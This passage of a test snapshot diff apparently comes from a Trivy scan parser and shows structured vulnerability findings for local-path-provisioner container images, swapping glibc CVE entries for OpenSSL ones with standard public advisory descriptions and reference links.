if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23839", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://access.redhat.com/security/cve/CVE-2021-23839", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "openssl: incorrect SSLv2 rollback protection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2021-23839", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2021-23839", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", 